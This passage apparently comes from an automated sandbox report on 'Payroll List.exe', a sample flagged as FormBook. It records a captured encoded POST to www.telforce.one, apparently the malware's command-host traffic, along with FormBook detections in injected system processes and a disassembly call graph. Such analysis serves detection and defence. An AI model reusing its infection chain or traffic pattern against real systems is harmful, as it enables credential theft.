                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  34192.168.2.84974264.190.63.22280
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:47:10.438092947 CET827OUTPOST /ykhz/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.telforce.one
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.telforce.one
                                                                  Referer: http://www.telforce.one/ykhz/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 54 6c 59 58 50 45 64 70 63 68 47 44 79 72 34 51 76 50 6d 47 4d 33 52 34 50 52 32 79 64 7a 31 64 30 7a 63 31 55 2f 6b 7a 32 57 71 33 4b 75 56 43 48 36 7a 61 47 4b 6b 76 6e 72 74 77 64 37 33 68 35 6e 71 34 53 79 76 4b 72 44 56 2f 63 54 6a 65 6c 52 64 48 32 54 39 4a 71 74 4c 4b 4a 53 47 2f 38 78 66 38 65 53 31 68 57 37 6f 53 43 37 61 5a 7a 74 2f 54 58 58 30 6f 37 47 61 41 4a 63 42 61 38 6a 4d 57 61 46 48 41 48 50 6f 4a 4c 42 74 77 65 79 44 6f 35 57 55 56 2b 2b 50 49 6c 6e 6a 39 68 68 79 2f 4d 31 50 4c 36 42 73 46 79 70 35 68 6a 51 75 72 4c 5a 6a 6c 71 58 64 65 71 68 6c 31 73 36 72 32 75 4b 61 6f 32 62 52 34 7a 5a 4f 4a 70 37 65 37 34 4e 55 36 78 72 49 43
                                                                  Data Ascii: NjHpTfh=TlYXPEdpchGDyr4QvPmGM3R4PR2ydz1d0zc1U/kz2Wq3KuVCH6zaGKkvnrtwd73h5nq4SyvKrDV/cTjelRdH2T9JqtLKJSG/8xf8eS1hW7oSC7aZzt/TXX0o7GaAJcBa8jMWaFHAHPoJLBtweyDo5WUV++PIlnj9hhy/M1PL6BsFyp5hjQurLZjlqXdeqhl1s6r2uKao2bR4zZOJp7e74NU6xrIC
                                                                  Nov 22, 2024 14:47:11.826364040 CET707INHTTP/1.1 405 Not Allowed
                                                                  date: Fri, 22 Nov 2024 13:47:11 GMT
                                                                  content-type: text/html
                                                                  content-length: 556
                                                                  server: Parking/1.0
                                                                  connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:08:44:00
                                                                  Start date:22/11/2024
                                                                  Path:C:\Users\user\Desktop\Payroll List.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\Payroll List.exe"
                                                                  Imagebase:0x120000
                                                                  File size:1'212'928 bytes
                                                                  MD5 hash:F15D8B7A5271A52273A158FF2F642D12
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:08:44:02
                                                                  Start date:22/11/2024
                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\Payroll List.exe"
                                                                  Imagebase:0x90000
                                                                  File size:46'504 bytes
                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1734177353.0000000003760000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1733855292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1734536564.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:08:44:25
                                                                  Start date:22/11/2024
                                                                  Path:C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe"
                                                                  Imagebase:0x610000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3292524183.0000000004FB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:5
                                                                  Start time:08:44:27
                                                                  Start date:22/11/2024
                                                                  Path:C:\Windows\SysWOW64\srdelayed.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\SysWOW64\srdelayed.exe"
                                                                  Imagebase:0x850000
                                                                  File size:16'384 bytes
                                                                  MD5 hash:B5F31FDCE1BE4171124B9749F9D2C600
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:08:44:27
                                                                  Start date:22/11/2024
                                                                  Path:C:\Windows\SysWOW64\ktmutil.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\ktmutil.exe"
                                                                  Imagebase:0x6f0000
                                                                  File size:15'360 bytes
                                                                  MD5 hash:AC387D5962B2FE2BF4D518DD57BA7230
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3292196090.0000000002900000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3291497446.0000000000680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3291358467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:moderate
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:7
                                                                  Start time:08:44:41
                                                                  Start date:22/11/2024
                                                                  Path:C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe"
                                                                  Imagebase:0x610000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3295460520.0000000005260000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:11
                                                                  Start time:08:44:53
                                                                  Start date:22/11/2024
                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                  Imagebase:0x7ff6d20e0000
                                                                  File size:676'768 bytes
                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:3.3%
                                                                    Dynamic/Decrypted Code Coverage:1%
                                                                    Signature Coverage:4.7%
                                                                    Total number of Nodes:1732
                                                                    Total number of Limit Nodes:152
                                                                    execution_graph 94632 123742 94633 12374b 94632->94633 94634 1237c6 94633->94634 94635 1237c8 94633->94635 94636 123769 94633->94636 94637 1237ab DefWindowProcW 94634->94637 94638 191e00 94635->94638 94639 1237ce 94635->94639 94640 123776 94636->94640 94641 12382c PostQuitMessage 94636->94641 94642 1237b9 94637->94642 94687 122ff6 16 API calls 94638->94687 94643 1237d3 94639->94643 94644 1237f6 SetTimer RegisterWindowMessageW 94639->94644 94646 191e88 94640->94646 94647 123781 94640->94647 94641->94642 94648 1237da KillTimer 94643->94648 94649 191da3 94643->94649 94644->94642 94651 12381f CreatePopupMenu 94644->94651 94693 164ddd 60 API calls _memset 94646->94693 94652 123836 94647->94652 94653 123789 94647->94653 94684 123847 Shell_NotifyIconW _memset 94648->94684 94656 191da8 94649->94656 94657 191ddc MoveWindow 94649->94657 94650 191e27 94688 13e312 342 API calls Mailbox 94650->94688 94651->94642 94677 13eb83 94652->94677 94660 191e6d 94653->94660 94661 123794 94653->94661 94663 191dcb SetFocus 94656->94663 94664 191dac 94656->94664 94657->94642 94660->94637 94692 15a5f3 48 API calls 94660->94692 94666 12379f 94661->94666 94667 191e58 94661->94667 94662 191e9a 94662->94637 94662->94642 94663->94642 94664->94666 94668 191db5 94664->94668 94665 1237ed 94685 12390f DeleteObject DestroyWindow Mailbox 94665->94685 94666->94637 94689 123847 Shell_NotifyIconW _memset 94666->94689 94691 1655bd 70 API calls _memset 94667->94691 94686 122ff6 16 API calls 94668->94686 94673 191e68 94673->94642 94675 191e4c 94690 124ffc 67 API calls _memset 94675->94690 94678 13ec1c 94677->94678 94679 13eb9a _memset 94677->94679 94678->94642 94694 1251af 94679->94694 94681 13ec05 KillTimer SetTimer 94681->94678 94682 13ebc1 94682->94681 94683 193c7a Shell_NotifyIconW 94682->94683 94683->94681 94684->94665 94685->94642 94686->94642 94687->94650 94688->94666 94689->94675 94690->94634 94691->94673 94692->94634 94693->94662 94695 1252a2 Mailbox 94694->94695 94696 1251cb 94694->94696 94695->94682 94716 126b0f 48 API calls 94696->94716 94698 1251d9 94699 1251e6 94698->94699 94700 193ca1 LoadStringW 94698->94700 94717 126a63 94699->94717 94702 193cbb 94700->94702 94705 12510d 48 API calls 94702->94705 94703 1251fb 94703->94702 94704 12520c 94703->94704 94706 125216 94704->94706 94707 1252a7 94704->94707 94710 193cc5 94705->94710 94728 12510d 94706->94728 94737 126eed 94707->94737 94712 125220 _memset _wcscpy 94710->94712 94741 12518c 94710->94741 94714 125288 Shell_NotifyIconW 94712->94714 94713 193ce7 94715 12518c 48 API calls 94713->94715 94714->94695 94715->94712 94716->94698 94718 126adf 94717->94718 94720 126a6f __wsetenvp 94717->94720 94762 12b18b 94718->94762 94721 126ad7 94720->94721 94722 126a8b 94720->94722 94761 12c369 48 API calls 94721->94761 94751 126b4a 48 API calls 94722->94751 94725 126ab6 ___crtGetEnvironmentStringsW 94725->94703 94726 126a95 94752 13ee75 94726->94752 94729 12511f 94728->94729 94730 191be7 94728->94730 94805 12b384 94729->94805 94814 15a58f 48 API calls ___crtGetEnvironmentStringsW 94730->94814 94733 191bf1 94735 126eed 48 API calls 94733->94735 94734 12512b 94734->94712 94736 191bf9 Mailbox 94735->94736 94738 126f00 94737->94738 94739 126ef8 94737->94739 94738->94712 94820 12dd47 48 API calls ___crtGetEnvironmentStringsW 94739->94820 94742 125197 94741->94742 94743 191ace 94742->94743 94744 12519f 94742->94744 94831 126b4a 48 API calls 94743->94831 94821 125130 94744->94821 94747 1251aa 94747->94713 94748 191adb __wsetenvp 94749 13ee75 48 API calls 94748->94749 94750 191b07 ___crtGetEnvironmentStringsW 94749->94750 94751->94726 94754 13f4ea __calloc_impl 94752->94754 94755 13f50c 94754->94755 94756 13f50e std::exception::exception 94754->94756 94766 14395c 94754->94766 94755->94725 94780 146805 RaiseException 94756->94780 94758 13f538 94781 14673b 47 API calls _free 94758->94781 94760 13f54a 94760->94725 94761->94725 94763 12b199 94762->94763 94765 12b1a2 ___crtGetEnvironmentStringsW 94762->94765 94763->94765 94788 12bdfa 94763->94788 94765->94725 94767 1439d7 __calloc_impl 94766->94767 94774 143968 __calloc_impl 94766->94774 94787 147c0e 47 API calls __getptd_noexit 94767->94787 94770 14399b RtlAllocateHeap 94771 1439cf 94770->94771 94770->94774 94771->94754 94773 143973 94773->94774 94782 1481c2 47 API calls 2 library calls 94773->94782 94783 14821f 47 API calls 8 library calls 94773->94783 94784 141145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94773->94784 94774->94770 94774->94773 94775 1439c3 94774->94775 94778 1439c1 94774->94778 94785 147c0e 47 API calls __getptd_noexit 94775->94785 94786 147c0e 47 API calls __getptd_noexit 94778->94786 94780->94758 94781->94760 94782->94773 94783->94773 94785->94778 94786->94771 94787->94771 94789 12be0d 94788->94789 94793 12be0a ___crtGetEnvironmentStringsW 94788->94793 94794 13f4ea 94789->94794 94791 12be17 94792 13ee75 48 API calls 94791->94792 94792->94793 94793->94765 94796 13f4f2 __calloc_impl 94794->94796 94795 14395c __crtLCMapStringA_stat 47 API calls 94795->94796 94796->94795 94797 13f50c 94796->94797 94798 13f50e std::exception::exception 94796->94798 94797->94791 94803 146805 RaiseException 94798->94803 94800 13f538 94804 14673b 47 API calls _free 94800->94804 94802 13f54a 94802->94791 94803->94800 94804->94802 94806 12b392 94805->94806 94807 12b3c5 ___crtGetEnvironmentStringsW 94805->94807 94806->94807 94808 12b3b8 94806->94808 94809 12b3fd 94806->94809 94807->94734 94807->94807 94815 12bb85 94808->94815 94810 13f4ea 48 API calls 94809->94810 94812 12b407 94810->94812 94813 13f4ea 48 API calls 94812->94813 94813->94807 94814->94733 94816 12bb9b 94815->94816 94819 12bb96 ___crtGetEnvironmentStringsW 94815->94819 94817 191b77 94816->94817 94818 13ee75 48 API calls 94816->94818 94818->94819 94819->94807 94820->94738 94822 12513f __wsetenvp 94821->94822 94823 125151 94822->94823 94824 191b27 94822->94824 94826 12bb85 48 API calls 94823->94826 94832 126b4a 48 API calls 94824->94832 94828 12515e ___crtGetEnvironmentStringsW 94826->94828 94827 191b34 94829 13ee75 48 API calls 94827->94829 94828->94747 94830 191b57 ___crtGetEnvironmentStringsW 94829->94830 94831->94748 94832->94827 94833 198eb8 94837 16a635 94833->94837 94835 198ec3 94836 16a635 84 API calls 94835->94836 94836->94835 94838 16a66f 94837->94838 94842 16a642 94837->94842 94838->94835 94839 16a671 94869 13ec4e 81 API calls 94839->94869 94840 16a676 94848 12936c 94840->94848 94842->94838 94842->94839 94842->94840 94846 16a669 94842->94846 94844 16a67d 94845 12510d 48 API calls 94844->94845 94845->94838 94868 134525 61 API calls ___crtGetEnvironmentStringsW 94846->94868 94849 129380 94848->94849 94850 129384 94848->94850 94849->94844 94851 194cbd __i64tow 94850->94851 94852 194bbf 94850->94852 94853 129398 94850->94853 94861 1293b0 __itow Mailbox _wcscpy 94850->94861 94855 194bc8 94852->94855 94856 194ca5 94852->94856 94870 14172b 80 API calls 3 library calls 94853->94870 94860 194be7 94855->94860 94855->94861 94877 14172b 80 API calls 3 library calls 94856->94877 94857 13f4ea 48 API calls 94859 1293ba 94857->94859 94859->94849 94871 12ce19 94859->94871 94862 13f4ea 48 API calls 94860->94862 94861->94857 94864 194c04 94862->94864 94865 13f4ea 48 API calls 94864->94865 94866 194c2a 94865->94866 94866->94849 94867 12ce19 48 API calls 94866->94867 94867->94849 94868->94838 94869->94840 94870->94861 94872 12ce28 __wsetenvp 94871->94872 94873 13ee75 48 API calls 94872->94873 94874 12ce50 ___crtGetEnvironmentStringsW 94873->94874 94875 13f4ea 48 API calls 94874->94875 94876 12ce66 94875->94876 94876->94849 94877->94861 94878 19197b 94883 13dd94 94878->94883 94882 19198a 94884 13f4ea 48 API calls 94883->94884 94885 13dd9c 94884->94885 94886 13ddb0 94885->94886 94891 13df3d 94885->94891 94890 140f0a 52 API calls __cinit 94886->94890 94890->94882 94892 13df46 94891->94892 94893 13dda8 94891->94893 94923 140f0a 52 API calls __cinit 94892->94923 94895 13ddc0 94893->94895 94924 12d7f7 94895->94924 94898 126a63 48 API calls 94899 13de1a 94898->94899 94929 13dfb4 94899->94929 94903 1924c8 94907 13debb 94910 13dee3 94907->94910 94911 13df31 GetSystemInfo 94907->94911 94908 13dea4 GetCurrentProcess 94946 13df5f LoadLibraryA GetProcAddress 94908->94946 94940 13e00c 94910->94940 94912 13df0e 94911->94912 94914 13df21 94912->94914 94915 13df1c FreeLibrary 94912->94915 94914->94886 94915->94914 94917 13df29 GetSystemInfo 94920 13df03 94917->94920 94918 13def9 94943 13dff4 94918->94943 94920->94912 94922 13df09 FreeLibrary 94920->94922 94922->94912 94923->94893 94925 13f4ea 48 API calls 94924->94925 94926 12d818 94925->94926 94927 13f4ea 48 API calls 94926->94927 94928 12d826 GetVersionExW 94927->94928 94928->94898 94930 13dfbd 94929->94930 94931 12b18b 48 API calls 94930->94931 94932 13de22 94931->94932 94933 126571 94932->94933 94934 12657f 94933->94934 94935 12b18b 48 API calls 94934->94935 94936 12658f 94935->94936 94936->94903 94937 13df77 94936->94937 94947 13df89 94937->94947 94951 13e01e 94940->94951 94944 13e00c 2 API calls 94943->94944 94945 13df01 GetNativeSystemInfo 94944->94945 94945->94920 94946->94907 94948 13dea0 94947->94948 94949 13df92 LoadLibraryA 94947->94949 94948->94907 94948->94908 94949->94948 94950 13dfa3 GetProcAddress 94949->94950 94950->94948 94952 13def1 94951->94952 94953 13e027 LoadLibraryA 94951->94953 94952->94917 94952->94918 94953->94952 94954 13e038 GetProcAddress 94953->94954 94954->94952 94955 1919cb 94960 122322 94955->94960 94957 1919d1 94993 140f0a 52 API calls __cinit 94957->94993 94959 1919db 94961 122344 94960->94961 94994 1226df 94961->94994 94966 12d7f7 48 API calls 94967 122384 94966->94967 94968 12d7f7 48 API calls 94967->94968 94969 12238e 94968->94969 94970 12d7f7 48 API calls 94969->94970 94971 122398 94970->94971 94972 12d7f7 48 API calls 94971->94972 94973 1223de 94972->94973 94974 12d7f7 48 API calls 94973->94974 94975 1224c1 94974->94975 95002 12263f 94975->95002 94979 1224f1 94980 12d7f7 48 API calls 94979->94980 94981 1224fb 94980->94981 95031 122745 94981->95031 94983 122546 94984 122556 GetStdHandle 94983->94984 94985 1225b1 94984->94985 94986 19501d 94984->94986 94988 1225b7 CoInitialize 94985->94988 94986->94985 94987 195026 94986->94987 95038 1692d4 53 API calls 94987->95038 94988->94957 94990 19502d 95039 1699f9 CreateThread 94990->95039 94992 195039 CloseHandle 94992->94988 94993->94959 95040 122854 94994->95040 94997 126a63 48 API calls 94998 12234a 94997->94998 94999 12272e 94998->94999 95054 1227ec 6 API calls 94999->95054 95001 12237a 95001->94966 95003 12d7f7 48 API calls 95002->95003 95004 12264f 95003->95004 95005 12d7f7 48 API calls 95004->95005 95006 122657 95005->95006 95055 1226a7 95006->95055 95009 1226a7 48 API calls 95010 122667 95009->95010 95011 12d7f7 48 API calls 95010->95011 95012 122672 95011->95012 95013 13f4ea 48 API calls 95012->95013 95014 1224cb 95013->95014 95015 1222a4 95014->95015 95016 1222b2 95015->95016 95017 12d7f7 48 API calls 95016->95017 95018 1222bd 95017->95018 95019 12d7f7 48 API calls 95018->95019 95020 1222c8 95019->95020 95021 12d7f7 48 API calls 95020->95021 95022 1222d3 95021->95022 95023 12d7f7 48 API calls 95022->95023 95024 1222de 95023->95024 95025 1226a7 48 API calls 95024->95025 95026 1222e9 95025->95026 95027 13f4ea 48 API calls 95026->95027 95028 1222f0 95027->95028 95029 1222f9 RegisterWindowMessageW 95028->95029 95030 191fe7 95028->95030 95029->94979 95032 195f4d 95031->95032 95033 122755 95031->95033 95060 16c942 50 API calls 95032->95060 95035 13f4ea 48 API calls 95033->95035 95037 12275d 95035->95037 95036 195f58 95037->94983 95038->94990 95039->94992 95061 1699df 54 API calls 95039->95061 95047 122870 95040->95047 95043 122870 48 API calls 95044 122864 95043->95044 95045 12d7f7 48 API calls 95044->95045 95046 122716 95045->95046 95046->94997 95048 12d7f7 48 API calls 95047->95048 95049 12287b 95048->95049 95050 12d7f7 48 API calls 95049->95050 95051 122883 95050->95051 95052 12d7f7 48 API calls 95051->95052 95053 12285c 95052->95053 95053->95043 95054->95001 95056 12d7f7 48 API calls 95055->95056 95057 1226b0 95056->95057 95058 12d7f7 48 API calls 95057->95058 95059 12265f 95058->95059 95059->95009 95060->95036 95062 1919ba 95067 13c75a 95062->95067 95066 1919c9 95068 12d7f7 48 API calls 95067->95068 95069 13c7c8 95068->95069 95075 13d26c 95069->95075 95072 13c865 95073 13c881 95072->95073 95078 13d1fa 48 API calls ___crtGetEnvironmentStringsW 95072->95078 95074 140f0a 52 API calls __cinit 95073->95074 95074->95066 95079 13d298 95075->95079 95078->95072 95080 13d28b 95079->95080 95081 13d2a5 95079->95081 95080->95072 95081->95080 95082 13d2ac RegOpenKeyExW 95081->95082 95082->95080 95083 13d2c6 RegQueryValueExW 95082->95083 95084 13d2e7 95083->95084 95085 13d2fc RegCloseKey 95083->95085 95084->95085 95085->95080 95086 1919dd 95091 124a30 95086->95091 95088 1919f1 95111 140f0a 52 API calls __cinit 95088->95111 95090 1919fb 95092 124a40 __ftell_nolock 95091->95092 95093 12d7f7 48 API calls 95092->95093 95094 124af6 95093->95094 95112 125374 95094->95112 95096 124aff 95119 12363c 95096->95119 95099 12518c 48 API calls 95100 124b18 95099->95100 95125 1264cf 95100->95125 95103 12d7f7 48 API calls 95104 124b32 95103->95104 95131 1249fb 95104->95131 95106 124b43 Mailbox 95106->95088 95107 1261a6 48 API calls 95108 124b3d _wcscat Mailbox __wsetenvp 95107->95108 95108->95106 95108->95107 95109 12ce19 48 API calls 95108->95109 95110 1264cf 48 API calls 95108->95110 95109->95108 95110->95108 95111->95090 95145 14f8a0 95112->95145 95115 12ce19 48 API calls 95116 1253a7 95115->95116 95147 12660f 95116->95147 95118 1253b1 Mailbox 95118->95096 95120 123649 __ftell_nolock 95119->95120 95154 12366c GetFullPathNameW 95120->95154 95122 12365a 95123 126a63 48 API calls 95122->95123 95124 123669 95123->95124 95124->95099 95126 12651b 95125->95126 95130 1264dd ___crtGetEnvironmentStringsW 95125->95130 95128 13f4ea 48 API calls 95126->95128 95127 13f4ea 48 API calls 95129 124b29 95127->95129 95128->95130 95129->95103 95130->95127 95156 12bcce 95131->95156 95134 1941cc RegQueryValueExW 95136 1941e5 95134->95136 95137 194246 RegCloseKey 95134->95137 95135 124a2b 95135->95108 95138 13f4ea 48 API calls 95136->95138 95139 1941fe 95138->95139 95162 1247b7 95139->95162 95142 19423b 95142->95137 95143 194224 95144 126a63 48 API calls 95143->95144 95144->95142 95146 125381 GetModuleFileNameW 95145->95146 95146->95115 95148 14f8a0 __ftell_nolock 95147->95148 95149 12661c GetFullPathNameW 95148->95149 95150 126a63 48 API calls 95149->95150 95151 126643 95150->95151 95152 126571 48 API calls 95151->95152 95153 12664f 95152->95153 95153->95118 95155 12368a 95154->95155 95155->95122 95157 124a0a RegOpenKeyExW 95156->95157 95158 12bce8 95156->95158 95157->95134 95157->95135 95159 13f4ea 48 API calls 95158->95159 95160 12bcf2 95159->95160 95161 13ee75 48 API calls 95160->95161 95161->95157 95163 13f4ea 48 API calls 95162->95163 95164 1247c9 RegQueryValueExW 95163->95164 95164->95142 95164->95143 95165 145dfd 95166 145e09 _fprintf 95165->95166 95202 147eeb GetStartupInfoW 95166->95202 95168 145e0e 95204 149ca7 GetProcessHeap 95168->95204 95170 145e66 95171 145e71 95170->95171 95289 145f4d 47 API calls 3 library calls 95170->95289 95205 147b47 95171->95205 95174 145e77 95176 145e82 __RTC_Initialize 95174->95176 95290 145f4d 47 API calls 3 library calls 95174->95290 95226 14acb3 95176->95226 95178 145e91 95179 145e9d GetCommandLineW 95178->95179 95291 145f4d 47 API calls 3 library calls 95178->95291 95245 152e7d GetEnvironmentStringsW 95179->95245 95182 145e9c 95182->95179 95186 145ec2 95258 152cb4 95186->95258 95189 145ec8 95190 145ed3 95189->95190 95293 14115b 47 API calls 3 library calls 95189->95293 95272 141195 95190->95272 95193 145edb 95194 145ee6 __wwincmdln 95193->95194 95294 14115b 47 API calls 3 library calls 95193->95294 95276 123a0f 95194->95276 95197 145efa 95198 145f09 95197->95198 95295 1413f1 47 API calls _doexit 95197->95295 95296 141186 47 API calls _doexit 95198->95296 95201 145f0e _fprintf 95203 147f01 95202->95203 95203->95168 95204->95170 95297 14123a 30 API calls 2 library calls 95205->95297 95207 147b4c 95298 147e23 InitializeCriticalSectionAndSpinCount 95207->95298 95209 147b51 95210 147b55 95209->95210 95300 147e6d TlsAlloc 95209->95300 95299 147bbd 50 API calls 2 library calls 95210->95299 95213 147b5a 95213->95174 95214 147b67 95214->95210 95215 147b72 95214->95215 95301 146986 95215->95301 95218 147bb4 95309 147bbd 50 API calls 2 library calls 95218->95309 95221 147b93 95221->95218 95223 147b99 95221->95223 95222 147bb9 95222->95174 95308 147a94 47 API calls 4 library calls 95223->95308 95225 147ba1 GetCurrentThreadId 95225->95174 95227 14acbf _fprintf 95226->95227 95318 147cf4 95227->95318 95229 14acc6 95230 146986 __calloc_crt 47 API calls 95229->95230 95231 14acd7 95230->95231 95232 14ad42 GetStartupInfoW 95231->95232 95233 14ace2 @_EH4_CallFilterFunc@8 _fprintf 95231->95233 95240 14ae80 95232->95240 95242 14ad57 95232->95242 95233->95178 95234 14af44 95325 14af58 LeaveCriticalSection _doexit 95234->95325 95236 14ada5 95236->95240 95243 14ade5 InitializeCriticalSectionAndSpinCount 95236->95243 95244 14add7 GetFileType 95236->95244 95237 14aec9 GetStdHandle 95237->95240 95238 146986 __calloc_crt 47 API calls 95238->95242 95239 14aedb GetFileType 95239->95240 95240->95234 95240->95237 95240->95239 95241 14af08 InitializeCriticalSectionAndSpinCount 95240->95241 95241->95240 95242->95236 95242->95238 95242->95240 95243->95236 95244->95236 95244->95243 95246 145ead 95245->95246 95247 152e8e 95245->95247 